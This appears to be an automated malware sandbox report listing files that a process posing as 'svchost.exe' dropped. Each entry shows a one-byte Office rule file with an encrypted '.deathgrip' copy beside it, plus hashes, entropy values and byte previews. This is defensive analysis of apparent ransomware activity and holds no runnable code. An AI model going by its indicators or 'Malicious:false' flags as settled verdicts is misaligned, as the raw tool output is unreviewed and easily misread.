                                                          Preview:..........5..`......mXs..u..........`wx..F'.^....5a+P:.#.M~;.b....a.....C..P..(.Y.K..A.....,..$..[.......8...H.Y.:W7._.m....;.mp.4..../...<.-|N.....fc.D.l..F...G2.."...R...4.....Vk.d.2qV...JG.1.|8..)..f.E"........:......!VCv.|2....}..!.8.V..n....D...&$a....tHs.{3m.]`V.3a..f.=.k..B.e.9-P$.0...R......R4.Nd?6y.y[......N...._..>.>.m".Qf.`yEWh.!hw8....y"j..+..:....n..u.b......Z.........._.Q..\y.P...._U.p.>..1....Jiw...e.E\.x....+rVb..R.../.Z....4.....lH..`z.......<8R.*.8..'3u....t.a.4.. .....X....pqNg..b7X.T...... &.n.Csv..8{.81J.(..I...X.........8(...c..A{C...N)....S..^<T.|./E.$........1..J...x:3......C..[...)..e....[p<.i{>..B..@~..,[/V.4.qS...I...%.I....'(H..D,.....'....Fz0...&S.8MXsd.~....N.B....]]. ..c..y.R.....9..%BI.*rM)b....0t.J..0....lq8.,..X?X....w-..z5*..D.e4:.......!l.p.5....R.@..X....?...M.i..{~...l.'..........A.r...x..T4.E.pM..}.. ...C...&.B..#|.G.?...wY......P,.....enz.?.I'QG^...=..\.r.</.}\..*..[.1.%.l....f.i.~.k]xz=tR......(.o...._...C\p

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule23124v0.xml

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule23124v0.xml.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):2400
                                                          Entropy (8bit):7.8855791093618794
                                                          Encrypted:false
                                                          SSDEEP:48:1dwJ5r/DNLZ18yxfp14/HKiEvDKSDNx0qOln10FRAlk+hQ3YeAq/:IX/D5Z1/1C/ENNVClk+hQYc/
                                                          MD5:E8226F63562348B474067C40CAED1F01
                                                          SHA1:206E0694438C3BB9460B9B9877300E97A5CF2C8A
                                                          SHA-256:553723F041F21DEEBA5FB87DAEE97E5AEAC9C1B24796E3AB2C8D9FECF21D85CC
                                                          SHA-512:9F4E80B20BC066468ED44091BF1AA1F53493389909ED2D3DB148119A0E94F2065671BD9D99244FD689FC1CC80064CCC2BEF817A6E51E35AF3D8A4E65FE83B8E0
                                                          Malicious:false
                                                          Preview:.........FW~.%....5^..z.M"{..B.G..X.c..B.$).EB.ig1....FES.^.v?....$....Q.%.$.....>.8.....M..|.i2..f...Q.t....".CiH7.7....o...9....Xu...lE.9....hb}...I..bZ.8`..g]..,$.9._3....b...3.p.W}...i...0.o."D.R...i.o<n.E........G..yV..=.d.._2.....m...........V....,..'R....;.?o..i1..... p.?. nv5....T..s.....2.taU......0@.Z.Z...u..F.PS.........Li.,4C..b.t......... .H..?J/..:~`./#;\.....r...<...X.L....vy..,ZFm...UhQ..*C.X..L.....y......ZYiy......n.....q...2..;YI......T'...0a.9..O....{.*.d.SG.)d..R...m:..0!s.[.O...^9.;6.`...8t...v..1.I|..[m.m.SWv.....6...L.<.x.g._{*....fN+9W2!..).E.-.N%P...J..=.......h'./...=...'......:.^....9fr./..mN...2c..+..Yp.r__m..f.Uc......b....K...s....g........d}}.[Q.4Tbit.......i%,n.c.....(..&..(..AR"....)qb..A..M..X6..Uo.Mg...Y.5w.v.[.V......p..."..Q.A....W"...&~..2!a%......@.H.M..l.V..B.F...w.%.>.5..Zt ...d.j.'.;.......E/.._.}.....y=J.F......F.p:..G....f.J....%......G.;..S...p..y.#..:6...87z...Q|.U3..U..s.#.$.......

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule23125v0.xml

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule23125v0.xml.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):8
                                                          Entropy (8bit):3.0
                                                          Encrypted:false
                                                          SSDEEP:3:/:/
                                                          MD5:0EE0646C1C77D8131CC8F4EE65C7673B
                                                          SHA1:DD5783BCF1E9002BC00AD5B83A95ED6E4EBB4AD5
                                                          SHA-256:66840DDA154E8A113C31DD0AD32F7F3A366A80E8136979D8F5A101D3D29D6F72
                                                          SHA-512:1818CC2ACD207880A07AFC360FD0DA87E51CCF17E7C604C4EB16BE5788322724C298E1FCC66EB293926993141EF0863C09EDA383188CF5DF49B910AACAC17EC5
                                                          Malicious:false
                                                          Preview:........

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule240005v8.xml

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule240005v8.xml.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1568
                                                          Entropy (8bit):7.781634566827969
                                                          Encrypted:false
                                                          SSDEEP:48:w9Kz3biLQUHRRV32p8rWkLc0vhMR12iTO5:w0ri573FW10ZMR12is
                                                          MD5:958CF3B1B48F896E4821C98B5E97E17E
                                                          SHA1:4908B29A331EFADEF29CA989E1969531D8B0C823
                                                          SHA-256:D96669D9E06DAC6174951BC946197E24A1A067CD8D896BD86716168356AE5C7F
                                                          SHA-512:774135D98B96C594BCA091936E2A8F9BD83277DAC5007B5B78477FBBFD690DD7D6C8865253CFC27298FFBC612FFBA27B6FD6F356C49E3DC8103B0C0FB16BF31F
                                                          Malicious:false
                                                          Preview:.........,.....3N..TK....H(..Z.D;..f..s.[.Y......Tx:b.r.R..U..N|.g..d...._k...u....9.. .li.c..&_..R..!JY:s..u...x.....`.7...M...+...[&.8J.0..|.$...+.6.....Y.7Y-h.gB.7....PZ..T.$;w....<.*n..5.fv...<*q..-g~)........J.(b2k.Jw".......9...j,..7KH.=.#.e.<...K.2......|..`.y...G..#..9.6.......D}.j..a.C.RJ....Q......|..S.n...Z.%..it...U5p;s_i.....3k.R.......... ......v....J..c..&....0.F/..."[...a.>..G.../...s[;2k...?..Y0..s.V.@R. ...70....$.L......$..%......vJ.2.....q. .O}..Y.3..%=R(...7.Jf].D.....QZ.O......_r{Bp.....W.._da.VU....5.K.;...;,.0..+...;.P.Y.m.^.......T..V!m.?%;u....=8RV...._..MSg..E.o.+<.l2s.DQ..-v....F..K..-o...K.?.5..W.p..r..H...5...R.-..Y....+..v(r........@..Qp.J.7O.*..%.L..m/.|...P...9..1.12.?.N...6.]...l.....v_4..G0X...:.....SV?1.(P.+.S+qA..p.>5X..^.<.....JJL0..QaO.b.%%...?....0D^.......z....8d:...e...B.@.W.`......,.:........>$.}e.uw.H......W......0.Nw(..t...}S....)..?.7X.........G....u...^...Y.bi......q."....

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule240006v2.xml

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule240006v2.xml.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):8
                                                          Entropy (8bit):3.0
                                                          Encrypted:false
                                                          SSDEEP:3:/:/
                                                          MD5:0EE0646C1C77D8131CC8F4EE65C7673B
                                                          SHA1:DD5783BCF1E9002BC00AD5B83A95ED6E4EBB4AD5
                                                          SHA-256:66840DDA154E8A113C31DD0AD32F7F3A366A80E8136979D8F5A101D3D29D6F72
                                                          SHA-512:1818CC2ACD207880A07AFC360FD0DA87E51CCF17E7C604C4EB16BE5788322724C298E1FCC66EB293926993141EF0863C09EDA383188CF5DF49B910AACAC17EC5
                                                          Malicious:false
                                                          Preview:........

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule240007v2.xml

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule240007v2.xml.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):8
                                                          Entropy (8bit):3.0
                                                          Encrypted:false
                                                          SSDEEP:3:/:/
                                                          MD5:0EE0646C1C77D8131CC8F4EE65C7673B
                                                          SHA1:DD5783BCF1E9002BC00AD5B83A95ED6E4EBB4AD5
                                                          SHA-256:66840DDA154E8A113C31DD0AD32F7F3A366A80E8136979D8F5A101D3D29D6F72
                                                          SHA-512:1818CC2ACD207880A07AFC360FD0DA87E51CCF17E7C604C4EB16BE5788322724C298E1FCC66EB293926993141EF0863C09EDA383188CF5DF49B910AACAC17EC5
                                                          Malicious:false
                                                          Preview:........

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule240008v1.xml

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule240008v1.xml.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):8
                                                          Entropy (8bit):3.0
                                                          Encrypted:false
                                                          SSDEEP:3:/:/
                                                          MD5:0EE0646C1C77D8131CC8F4EE65C7673B
                                                          SHA1:DD5783BCF1E9002BC00AD5B83A95ED6E4EBB4AD5
                                                          SHA-256:66840DDA154E8A113C31DD0AD32F7F3A366A80E8136979D8F5A101D3D29D6F72
                                                          SHA-512:1818CC2ACD207880A07AFC360FD0DA87E51CCF17E7C604C4EB16BE5788322724C298E1FCC66EB293926993141EF0863C09EDA383188CF5DF49B910AACAC17EC5
                                                          Malicious:false
                                                          Preview:........

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule240009v3.xml.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):864
                                                          Entropy (8bit):7.451221399253438
                                                          Encrypted:false
                                                          SSDEEP:24:Xvp2OHbvQV/L6mTU4OjrBxYu4r91J8PyCSLEn:/pnoV/mIOjrBiu4r2q+
                                                          MD5:CF6A238970A38B24BE9B6BAA3B137FC4
                                                          SHA1:742D7E042163C426F924F6DB490A6BA6EEB48CA3
                                                          SHA-256:F580FE9EED309BC42AEE840EFBF2D6749512B21775A3041EEE442EAB3B504C32
                                                          SHA-512:38B580D8106C77989B67CC771CC671A3A73EAE4C99781CF0A77282922A6C6F4F31F79FDE74CF9B90AA77F17A820832E5BB99EFF3E0ED95EC03ABC472447FF586
                                                          Malicious:false
                                                          Preview:.........,0..F..E.I....u......`.I..c24]$+...X.!.Vln...V...."t....?.u..."Q..Lux...#^i&O....z.|.v..sR.,....q.R6".b|).I..r@.p...5.bc..v.J.vCpttRD...<.....)I..@F8.x..ZC.k.h.%..c.p.E .:ST2aA..S%.r.~."k.O..ju..*L.@.U&.7{.Nu}..f<...>{...YU......(L......e.P...ym.P3*Kz..Q>.W..6....F........e7.....(..T...3.Q/.<./<...!V.....X.5!PmI....?B..q..K..S...G%.....(.!......B.L+.H.5U..A.R9D.rEm.....'.f.EY"@.X.;......!.D.X.c%.{.0..!9...{.....sX..W.....{...P.$...7.|..T.9....X..t..H...x(.cd.&...F...T..D3....sKm0P8GToK2aEee8z6U/Qj4VnrqGnaqntkN3idgFpOwiJkncNRfmVJrLkuA4CdmUbeyN5hHd6ds+eVU0K9mCMFOTWlnKgYd2cl1EjvQiOhmTqHIlkCKF3Db3166tPlPQx57sOioaZ7ElbfRDM9DM7mLheLWAZn1huhY/2V7cWJ779oaKry2kkGY2cdVYbeYma/jROSnxZ3Apmuq0w20ZFfhUaZelT7j6B61AMleN/9SP6mRElooVupGg6j2u5hcFc0H4IobdsSswLU5vsK4LvhxVzqdp5lN0fJn02kqUrUkpxEHRJOIyO3TM2lKEAJSET7uXuo49ocDvbPs1LYB8aw==

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule240010v2.xml

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule240010v2.xml.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1040
                                                          Entropy (8bit):7.5918904829200775
                                                          Encrypted:false
                                                          SSDEEP:24:Xvv+NGOGXmeo5oEtceBxM9BXQqAeXE+HjWmN6inzlJqca:/v+2bWo8dxWBXmeBDWOz33a
                                                          MD5:A7FD1F77CB486FAFB9A76C8C3314BCB9
                                                          SHA1:3CE917C406A5678DDFE5313659E303613CCDE021
                                                          SHA-256:8FCB497155964018B1C3F6BD1E4D66C293CC5729A1BD04591D0C01D7E9008504
                                                          SHA-512:63F407125680D317EE4C0824AB04DFEC0938AAF51694140BD2F94C2A33FB309578BCB1D4BBBBE35360CF5DE7E15D5C60F9FB78A678BE3E4F34557D942C5D1AA1
                                                          Malicious:false
                                                          Preview:.........,0..F..E.I....u......`.I..c24]$+...X.!.Vln.....J}x...}.Z.o.!t..h:(....!....(.rx.vUM-.T.yh{.<.\"..........N.p{D....p....Tr,..B.`$h.!0.)..Q-.A....G. .L...Z..D}.3EKW<.S.F.d.i.>IbC...Vu.)..U....B..._.s.T...P.;.v..a...Z.4\.E..+*3<fbMK...1ui.R.....0....]fQaN...65.%7...Ww>....RT.4..Y.=U.NW....69....:.Gb,.26..L.n.>$..5..^W..=..%......HB9sw6.p..u..u.=.g.;......7.gR..5~h(....P@....I.......|.#...e.".0.&.".......].b.|..x..u..>..b..}^..Ug..].r .0....[...0*~\b...|Se..e....B.u)..O. 8..'.F..H.G.C.h..L....p.@..;..t..w...G%.s=k.d..k.N..u.`..e(......B..Zf...hz..5dX^L6...]b(dmT.a......C.L.i;.#ToU.5.d....z.P?.......z..0R+..?pSp..)c...("xN..8.K).Q..H.6..|.|...;......O.....lJBM4EE0kX5JackxQkOJ7TCNTn6WV2Z0lTaNAexaKZ9VXS3Rbi+ayDyMfy+ZVGyVyQPsJ/pWHpzUlgOZpNRydd/N5wzyd5029Q9mm0DF0yNHV99nnzShON02aP8eCBXpcOFz2mdQGw/NWdlagLhytmbiH4IEx4UvPMiev5OMM60Ap8xz797bx/Jkw5QtxY/rrSXFc8CvTADvUTfJLUOcIaL7S5ugGuJ1jpOYUU8JaAhlKXxR4ZXw6pkF1Z1S3uRMtiJxJnOLuZit503GrfrjetdQqBDEj/7SM/XwywTBekw2itjig

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule240012v1.xml

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule240012v1.xml.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):8
                                                          Entropy (8bit):3.0
                                                          Encrypted:false
                                                          SSDEEP:3:/:/
                                                          MD5:0EE0646C1C77D8131CC8F4EE65C7673B
                                                          SHA1:DD5783BCF1E9002BC00AD5B83A95ED6E4EBB4AD5
                                                          SHA-256:66840DDA154E8A113C31DD0AD32F7F3A366A80E8136979D8F5A101D3D29D6F72
                                                          SHA-512:1818CC2ACD207880A07AFC360FD0DA87E51CCF17E7C604C4EB16BE5788322724C298E1FCC66EB293926993141EF0863C09EDA383188CF5DF49B910AACAC17EC5
                                                          Malicious:false
                                                          Preview:........

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule240013v1.xml.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):864
                                                          Entropy (8bit):7.459014956425726
                                                          Encrypted:false
                                                          SSDEEP:24:0CerF21vXAZ68YNtwQtcDm3N7WKKWSqc28F:LhAZFo6c7AWSqyF
                                                          MD5:7D772F995753D1575925C35FDDB59208
                                                          SHA1:B7EF2E0AC8A0EFCCCAFF38D858894282A030181B
                                                          SHA-256:E1AE81C3B4578516C52592EF2362195577097054F03286AE5D96A912974AFDB7
                                                          SHA-512:5DCCB04C97048E9D899E39C4EE1A4E7C1886A973B6E329F78B05A30F70CF33EF950D724DBAF220AA4BCC19B44DC7D6FC66228436939A48E48F64CEF93B220FD0
                                                          Malicious:false
                                                          Preview:.........F=?7>..+U.L..j.x.k........m.S.pD.....!^Z....e.:..vE.~....C2..........8.........hm.d....$.........y.....x.9......g3..N..j.^.....Z.Z>l.... i.....P...i/g.:....,....w.B..|.V{...."&d....L'.L...8{....]b....I4$rv.`...X..ci%s../x0e.@sor|I...C&/..qQqb.?07....x.....7..X...}..........g...W?i.7.hdcc..d.>h<..h....$.]5W\.....Z..-...2..._W......J.4.|Ii..7.t...tpT..=.>...Z...Y}n...sb..y.._t...~...........K...`M......7..A.J...8.d..\....+...@.e....)...f!..R...R....T..mJE...5e...E...o...^...n R...".GGBEY7PzEtIWoUNVkwVUqmm7cbjqPe6ju4/EB+hdytwU0QdpTdTeYW5g8DROKU9+U5kskVdl69bvcg4VuyDgRiPTo5LXEZMlujEi2HNNIhIHSxhECMs50H3drBVJdFozPVMoJONb/oTjdH9ACRGC4YYlyDZFUiNeW2f0T6d7R38JipzzIzW2iWgRdmI2VC4CH1EJM/cFB9L8ofp1Dm8DbC7VN6aX/iMe/fEnfHjWrbZeRwY6G6ef5M2Ws4NfRj66c5am0iL8uMwJmhsOeUn3ixfZLMIhGOkO8/LQjBml3eWU/BcCg9Mjuv4ZN/C/XTY//6jLt+QwUSwiF7z7Bd4e4DQ==

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule700350v1.xml

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule700351v1.xml

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule700351v1.xml.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1760
                                                          Entropy (8bit):7.812773428241969
                                                          Encrypted:false
                                                          SSDEEP:48:+VJOdH7t52Rl2vfyb3M2Rfx6ljLWs0eZLRR:UqbtYRMvfybdRutZL3
                                                          MD5:1ADFAA915A73E0784AAB085581BD4351
                                                          SHA1:DE095311B78B6490854A532E9BAB928B58F6D9EF
                                                          SHA-256:2E8B57404E212616F8EF12A1FE247BF7C2C8C810C9B0C164A03D387805E3A7BE
                                                          SHA-512:E3F344ABC25E06DDDE5ED737534E9BF48D565449FAD6DF00387B230AA5ADF5BF21066DA2D336BDF960F93452BE4CB2B52CC0301AE5305FA830A4CB173D003786
                                                          Malicious:false
                                                          Preview:.........VL.B..A.|....d.&.23....C...*./....Z.N....k...#..v.S].(c.p.. .0.....%.....K<)j@..X#.....cT..YM.Rm....p.,......9.....~wj.......v..B..d..>u...xN._AV.c..:"...9..%.........B.<.E.[j....l...$1S.z5.... .........ENMB3K.<..G.S....Ts.0..Wx..V..w:.3...@..w"7.8.;.`];.^'T..g].L/D..Uz...e.K..a.%p.(..i..{.H.F ...N...Ju.3./p.......3.b.Z.sB^K..*..an...|..=.L.......b.GE....d.(......V..T............... ..~k.?.Y....q".w...:..C..$0..4..J...`'.w..G\.8..br.........T._.[p...HDq.......!...S.(........QP.FD..^....5R.......B....a..]..,.b...BY....t.^..ZyT....K.X4.g..'.5.,e..........{,...u..3..R....'.Y/v......z......'.P..E....vp....w#...D...XA9......[.."..@...]..H..p..%...*...j./ed...{9~.Q.w..H......Ty..........X,.>.....ElO&.K%..ep..'...4.q$G.F....'...Z..8..B-Y1......:.&'g]..a~?.;z..S.-RS+l.~..}.e..8z.....<..v,.d.h:r%hA.PM..).:K....5..Ge...V..'......C..@~..7.C.g.g$.9..,.X%D.u..hg...L.....$..1.`....QP..3%.#....UQ.'\...`d...J..0.g..1......W..*..A`..HS..=H..

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule70036v0.xml

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule70036v0.xml.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):8
                                                          Entropy (8bit):3.0
                                                          Encrypted:false
                                                          SSDEEP:3:/:/
                                                          MD5:0EE0646C1C77D8131CC8F4EE65C7673B
                                                          SHA1:DD5783BCF1E9002BC00AD5B83A95ED6E4EBB4AD5
                                                          SHA-256:66840DDA154E8A113C31DD0AD32F7F3A366A80E8136979D8F5A101D3D29D6F72
                                                          SHA-512:1818CC2ACD207880A07AFC360FD0DA87E51CCF17E7C604C4EB16BE5788322724C298E1FCC66EB293926993141EF0863C09EDA383188CF5DF49B910AACAC17EC5
                                                          Malicious:false
                                                          Preview:........

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule70037v1.xml

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
